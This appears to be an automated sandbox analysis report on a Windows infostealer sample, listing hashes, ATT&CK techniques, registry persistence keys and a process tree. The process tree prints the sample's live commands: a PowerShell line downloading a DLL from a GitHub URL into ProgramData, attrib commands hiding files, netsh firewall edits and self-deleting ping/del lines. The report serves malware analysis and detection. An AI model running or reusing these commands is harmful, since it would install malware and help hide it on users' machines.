801f056a0d6fa25b60627d51f5c8ef3ad818d7250e7c0d3688b3bcd7e6cba893

Analysis

max time kernel
359s
max time network
363s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
13-11-2023 23:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client3245tt3q45.exe
Size

29KB
MD5

85253b35dcea8e7131541bd1ede1f686
SHA1

6c69103a6719fd3c612d992e56eb863b025d7433
SHA256

801f056a0d6fa25b60627d51f5c8ef3ad818d7250e7c0d3688b3bcd7e6cba893
SHA512

e1fb5c89c78a9ce1cccbecc236b9dd6c16affe5d78b652e9b19b8fb1df43b4c2956ccc864e872d99ed067d3e83f1ed8731586dc38966246132c31a7c1d5813f8
SSDEEP

768:GecUMOOo5HCljU0rDdIA/MDMAP79xt3C2hGXbGjD:5MON5KIAUDdT973C2hObg

Score

10^/10

evasion persistence spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/NGROKC/CTC/raw/main/CTC64.dll

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2556	powershell.exe
6	2556	powershell.exe

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
2904	netsh.exe
2796	netsh.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2248	attrib.exe
2760	attrib.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-.exe	$77-.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-.exe	$77-.exe

Executes dropped EXE 1 IoCs

pid	Process
3056	$77-.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77- = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-.exe"	$77-.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\$77- = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-.exe"	$77-.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
1680	PING.EXE
1600	PING.EXE
1376	PING.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2556	powershell.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

description	pid	Process
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe
Token: 33	3056	$77-.exe
Token: SeIncBasePriorityPrivilege	3056	$77-.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2428 wrote to memory of 1712	2428	Client3245tt3q45.exe	29
PID 2428 wrote to memory of 1712	2428	Client3245tt3q45.exe	29
PID 2428 wrote to memory of 1712	2428	Client3245tt3q45.exe	29
PID 2428 wrote to memory of 1712	2428	Client3245tt3q45.exe	29
PID 1712 wrote to memory of 2248	1712	cmd.exe	31
PID 1712 wrote to memory of 2248	1712	cmd.exe	31
PID 1712 wrote to memory of 2248	1712	cmd.exe	31
PID 1712 wrote to memory of 2248	1712	cmd.exe	31
PID 2428 wrote to memory of 2988	2428	Client3245tt3q45.exe	32
PID 2428 wrote to memory of 2988	2428	Client3245tt3q45.exe	32
PID 2428 wrote to memory of 2988	2428	Client3245tt3q45.exe	32
PID 2428 wrote to memory of 2988	2428	Client3245tt3q45.exe	32
PID 2592 wrote to memory of 3056	2592	explorer.exe	34
PID 2592 wrote to memory of 3056	2592	explorer.exe	34
PID 2592 wrote to memory of 3056	2592	explorer.exe	34
PID 2592 wrote to memory of 3056	2592	explorer.exe	34
PID 3056 wrote to memory of 2752	3056	$77-.exe	37
PID 3056 wrote to memory of 2752	3056	$77-.exe	37
PID 3056 wrote to memory of 2752	3056	$77-.exe	37
PID 3056 wrote to memory of 2752	3056	$77-.exe	37
PID 2752 wrote to memory of 2760	2752	cmd.exe	39
PID 2752 wrote to memory of 2760	2752	cmd.exe	39
PID 2752 wrote to memory of 2760	2752	cmd.exe	39
PID 2752 wrote to memory of 2760	2752	cmd.exe	39
PID 3056 wrote to memory of 2608	3056	$77-.exe	40
PID 3056 wrote to memory of 2608	3056	$77-.exe	40
PID 3056 wrote to memory of 2608	3056	$77-.exe	40
PID 3056 wrote to memory of 2608	3056	$77-.exe	40
PID 2608 wrote to memory of 2556	2608	cmd.exe	42
PID 2608 wrote to memory of 2556	2608	cmd.exe	42
PID 2608 wrote to memory of 2556	2608	cmd.exe	42
PID 2608 wrote to memory of 2556	2608	cmd.exe	42
PID 3056 wrote to memory of 2904	3056	$77-.exe	44
PID 3056 wrote to memory of 2904	3056	$77-.exe	44
PID 3056 wrote to memory of 2904	3056	$77-.exe	44
PID 3056 wrote to memory of 2904	3056	$77-.exe	44
PID 3056 wrote to memory of 2788	3056	$77-.exe	45
PID 3056 wrote to memory of 2788	3056	$77-.exe	45
PID 3056 wrote to memory of 2788	3056	$77-.exe	45
PID 3056 wrote to memory of 2788	3056	$77-.exe	45
PID 3056 wrote to memory of 2796	3056	$77-.exe	46
PID 3056 wrote to memory of 2796	3056	$77-.exe	46
PID 3056 wrote to memory of 2796	3056	$77-.exe	46
PID 3056 wrote to memory of 2796	3056	$77-.exe	46
PID 3056 wrote to memory of 1592	3056	$77-.exe	49
PID 3056 wrote to memory of 1592	3056	$77-.exe	49
PID 3056 wrote to memory of 1592	3056	$77-.exe	49
PID 3056 wrote to memory of 1592	3056	$77-.exe	49
PID 3056 wrote to memory of 284	3056	$77-.exe	53
PID 3056 wrote to memory of 284	3056	$77-.exe	53
PID 3056 wrote to memory of 284	3056	$77-.exe	53
PID 3056 wrote to memory of 284	3056	$77-.exe	53
PID 2788 wrote to memory of 1376	2788	cmd.exe	56
PID 2788 wrote to memory of 1376	2788	cmd.exe	56
PID 2788 wrote to memory of 1376	2788	cmd.exe	56
PID 2788 wrote to memory of 1376	2788	cmd.exe	56
PID 1592 wrote to memory of 1680	1592	cmd.exe	54
PID 1592 wrote to memory of 1680	1592	cmd.exe	54
PID 1592 wrote to memory of 1680	1592	cmd.exe	54
PID 1592 wrote to memory of 1680	1592	cmd.exe	54
PID 284 wrote to memory of 1600	284	cmd.exe	55
PID 284 wrote to memory of 1600	284	cmd.exe	55
PID 284 wrote to memory of 1600	284	cmd.exe	55
PID 284 wrote to memory of 1600	284	cmd.exe	55

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2248	attrib.exe
2760	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Client3245tt3q45.exe
"C:\Users\Admin\AppData\Local\Temp\Client3245tt3q45.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2428
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Client3245tt3q45.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1712
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Client3245tt3q45.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2248
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\System32\explorer.exe" C:\ProgramData\$77-.exe
  2⤵
  PID:2988

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:2592
- C:\ProgramData\$77-.exe
  "C:\ProgramData\$77-.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3056
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c attrib +s +h +r "C:\ProgramData\$77-.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r "C:\ProgramData\$77-.exe"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2760
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2608
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','C:\ProgramData\\r77-x64.dll');exit
      4⤵
      Blocklisted process makes network request
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2556
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\SInject1.exe"&exit
    3⤵
    - Modifies Windows Firewall
    PID:2904
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c ping 0 -n 2 & del "C:\ProgramData\$77-.lnk"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Windows\SysWOW64\PING.EXE
      ping 0 -n 2
      4⤵
      Runs ping.exe
      PID:1376
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall delete allowedprogram "C:\ProgramData\$77-.exe"
    3⤵
    - Modifies Windows Firewall
    PID:2796
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c ping 0 -n 2 & del "C:\ProgramData\$77-.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1592
  - - C:\Windows\SysWOW64\PING.EXE
      ping 0 -n 2
      4⤵
      Runs ping.exe
      PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c ping 0 -n 2 & del "C:\ProgramData\$77-.lnk"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:284
  - - C:\Windows\SysWOW64\PING.EXE
      ping 0 -n 2
      4⤵
      Runs ping.exe
      PID:1600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\$77-.exe

Filesize
29KB

MD5
85253b35dcea8e7131541bd1ede1f686

SHA1
6c69103a6719fd3c612d992e56eb863b025d7433

SHA256
801f056a0d6fa25b60627d51f5c8ef3ad818d7250e7c0d3688b3bcd7e6cba893

SHA512
e1fb5c89c78a9ce1cccbecc236b9dd6c16affe5d78b652e9b19b8fb1df43b4c2956ccc864e872d99ed067d3e83f1ed8731586dc38966246132c31a7c1d5813f8

Download Submit
C:\ProgramData\$77-.exe

Filesize
29KB

MD5
85253b35dcea8e7131541bd1ede1f686

SHA1
6c69103a6719fd3c612d992e56eb863b025d7433

SHA256
801f056a0d6fa25b60627d51f5c8ef3ad818d7250e7c0d3688b3bcd7e6cba893

SHA512
e1fb5c89c78a9ce1cccbecc236b9dd6c16affe5d78b652e9b19b8fb1df43b4c2956ccc864e872d99ed067d3e83f1ed8731586dc38966246132c31a7c1d5813f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rot.bat

Filesize
235B

MD5
fa2df82470638d18f85bc54dd7f001aa

SHA1
eae60eab30561b413dba2924782a858722c0ecbe

SHA256
ab41cefaca31b47651bcc22adf49d17a7fe094bcee8ee1cdc4d60ad4c6b5a604

SHA512
f17f20809c2a7f89925171d07fa3a4c7215274595e0eb2de8ce50ae466120ead7355224a1a830a023ac2a0abcb0c1932221d3c2c880b797d7bbb4bc5445326aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rot.bat

Filesize
235B

MD5
fa2df82470638d18f85bc54dd7f001aa

SHA1
eae60eab30561b413dba2924782a858722c0ecbe

SHA256
ab41cefaca31b47651bcc22adf49d17a7fe094bcee8ee1cdc4d60ad4c6b5a604

SHA512
f17f20809c2a7f89925171d07fa3a4c7215274595e0eb2de8ce50ae466120ead7355224a1a830a023ac2a0abcb0c1932221d3c2c880b797d7bbb4bc5445326aa

Download Submit
memory/2428-1-0x0000000073F10000-0x00000000745FE000-memory.dmp

Filesize
6.9MB

Download
memory/2428-3-0x0000000073F10000-0x00000000745FE000-memory.dmp

Filesize
6.9MB

Download
memory/2428-0-0x00000000000E0000-0x00000000000EE000-memory.dmp

Filesize
56KB

Download
memory/2556-23-0x0000000002560000-0x00000000025A0000-memory.dmp

Filesize
256KB

Download
memory/2556-25-0x000000006F780000-0x000000006FD2B000-memory.dmp

Filesize
5.7MB

Download
memory/2556-24-0x0000000002560000-0x00000000025A0000-memory.dmp

Filesize
256KB

Download
memory/2556-21-0x000000006F780000-0x000000006FD2B000-memory.dmp

Filesize
5.7MB

Download
memory/2556-22-0x000000006F780000-0x000000006FD2B000-memory.dmp

Filesize
5.7MB

Download
memory/3056-7-0x0000000073E40000-0x000000007452E000-memory.dmp

Filesize
6.9MB

Download
memory/3056-32-0x0000000005B80000-0x0000000005C14000-memory.dmp

Filesize
592KB

Download
memory/3056-6-0x00000000000C0000-0x00000000000CE000-memory.dmp

Filesize
56KB

Download
memory/3056-26-0x0000000073E40000-0x000000007452E000-memory.dmp

Filesize
6.9MB

Download
memory/3056-27-0x0000000001DE0000-0x0000000001DEE000-memory.dmp

Filesize
56KB

Download
memory/3056-28-0x00000000045A0000-0x00000000045AA000-memory.dmp

Filesize
40KB

Download
memory/3056-31-0x0000000005AE0000-0x0000000005B78000-memory.dmp

Filesize
608KB

Download
memory/3056-9-0x0000000005610000-0x0000000005650000-memory.dmp

Filesize
256KB

Download
memory/3056-34-0x0000000004910000-0x000000000491C000-memory.dmp

Filesize
48KB

Download
memory/3056-35-0x0000000001E20000-0x0000000001E2C000-memory.dmp

Filesize
48KB

Download
memory/3056-36-0x0000000005610000-0x0000000005650000-memory.dmp

Filesize
256KB

Download
memory/3056-37-0x0000000005610000-0x0000000005650000-memory.dmp

Filesize
256KB

Download
memory/3056-38-0x0000000001E10000-0x0000000001E1A000-memory.dmp

Filesize
40KB

Download
memory/3056-39-0x0000000073E40000-0x000000007452E000-memory.dmp

Filesize
6.9MB

Download